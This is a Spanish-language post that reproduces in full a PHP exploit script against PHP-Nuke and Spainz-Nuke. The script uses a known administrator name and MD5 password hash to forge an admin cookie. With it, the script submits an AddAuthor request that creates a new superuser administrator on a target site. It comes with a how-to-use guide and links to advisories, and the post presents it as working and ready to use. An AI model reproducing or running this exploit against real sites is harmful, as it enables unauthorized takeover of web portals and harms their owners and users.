exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP
blade ha escrito un exploit para el BuG de Inyeccion SQL para PHP-Nuke todas sus versiones y Spainz-Nuke en PHP, lo ha probado con las versiones Oficiales de PHP-Nuke y funciona perfectamente
.... Crea un administrador en el Portal vulnerable, a base de tener el nombre actual de el administrador y su password en MD5, un derivado del bug...
<?php
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit
By
BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee
BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee
BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee
BBB lll aad de
BBB lll aaaaaaaaaad dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee
BBBBBBBBBB lll aaa aaa ddd dddeeee
BBB BBB lll aaa aaa ddd ddd eee
BBB BBBB lll aaa aaa ddd ddd eee
BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee
BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee
BBBBBBBB lllll aa dddddddddd eeeeeee
<blade@abez.org>
|Blade «blade@abez.org»|
###www.abez.org Of AbeZ
##www.rzw.com.ar By XyborG
#www.fihezine.tsx.to Of FiH eZine
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
<title>PHP-Nuke & Spaiz-Nuke Injection Exploit v1.0 By Blade</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body>';
if (($action == "go") and ($server) and ($add_name) and ($add_email) and ($add_aid)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='add' method='get' action='http://" . $server . "/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name . "'>
<input type='hidden' name='add_aid' value='" . $add_aid . "'>
<input type='hidden' name='add_email' value='" . $add_email . "'>
<input type='hidden' name='add_url' value='" . $add_url . "'>
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
<input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
$hash . "</strong> . <br>New Administrator : <strong>" . $add_name . "</strong>.
In case that these data are not correct he returns from
<a href='javascript:history.back()'><strong>«Here»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
continue la operacion agregando el nuevo Administrador.</b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
</form>";
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="go">
</font></strong></u></p>
<div align="center">
<TABLE width="65%" border=0 align="center" cellPadding=0 cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Servidor
Vulneable:</font></strong></div></TD>
</TR>
<TR>
<TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
Servidor:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server" value="www.">
</div></TD>
</TR>
<TR>
<TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
Admin :</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR>
<TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="50" class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0 align="center">
<TBODY>
<TR>
<TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif">Datos
de la Cuenta:</font></strong></div></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre:</font></TD>
<TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name class="bginput">
<FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nickname:</font></TD>
<TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
<FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">E-Mail:</font></TD>
<TD><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email class="bginput">
<FONT class=tiny>(Obligatorio)</FONT></font></strong></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
<strong>
<input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
<FONT class=tiny><strong>(Obligatorio)</strong></FONT></font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
<TR>
<TD> </TD>
</TR>
</TABLE>
<div align="center">
<p align="center">
<INPUT name="submit" type=submit value="Crear Administrador" class="button">
</p>
</FORM>';
} if ($action != "go"){
echo'<div align="center"><u><font size="2" face="Verdana, Arial, Helvetica, sans-serif"></font></u></div>
<table width="100%" border="0" align="center">
<tr>
<td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Como
Usar: </strong></font></div><td>
</tr>
<tr>
<td width="18%"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Direccion
Servidor :</font></strong></td>
<td width="82%"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es
la URL correspondiente al Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Nombre
Admin :</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la identidad
en valor de nombre, del administrador del cual se conoce el password cifrado.
Ejemplo : xMan.</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Password
MD5 :</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password
cifrado en MD5 del administrador, cuyo nombre se conoce. Ejemplo: QmxhZGU6MWVhNTJmMjZlN2UwY2UwOGU0NjJmODdmNWUzNTA5NmM6</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Nombre
:</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el nombre
correspondiente al nuevo Administrador a crear. Ejemplo: BaxGo.</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Nickname
:</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el Nick
o Apodo, figurante para el nuevo administrador. Ejemplo: SysBack </font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»E-Mail
:</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el E-mail
que figurará en la nueva cuenta del Administrador. Ejemplo: sysback@phpnuke..com</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»URL
:</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es la URL
del Website del nuevo administrador. </font></td>
</tr>
<tr>
<td height="14"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">»Password
:</font></strong></td>
<td><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Es el password,
del cual el nuevo Administrador dependerá para ingresar en su futura
cuenta. </font></td>
</tr>
</table>
<br>
<div align="center">
<table width="45%" border="0">
<tr>
<td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Referencias:</strong></font></div></td>
</tr>
<tr>
<td width="47%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
Informacion De :</font></div></td>
<td width="53%"><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://rst.void.ru</a>
</font> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Mas
Informacion</strong> De :</font></div></td>
<td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
Informacion De :</font></div></td>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
Informacion De :</font></div></td>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.securityfocus.com/archive/1/340664" target="_blank">http://www.securityfocus.com</a></font><font size="1" face="Verdana, Arial, Helvetica, sans-serif"></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Mas
Informacion De :</font></div></td>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
</tr>
</table>';
}
echo'<center><p><font color="#003366" size="2" face="Verdana, Arial, Helvetica, sans-serif"><a href="mailto:blade@abez.org"><strong><u>PHP-Nuke
& Spaiz-Nuke SQL Injection Exploit By Blade.</u></strong></a></font></p></center>
</div>
</body>
</html>';
?>
Mostrar Mensajes
.... Crea un administrador en el Portal vulnerable, a base de tener el nombre actual de el administrador y su password en MD5, un derivado del bug... 
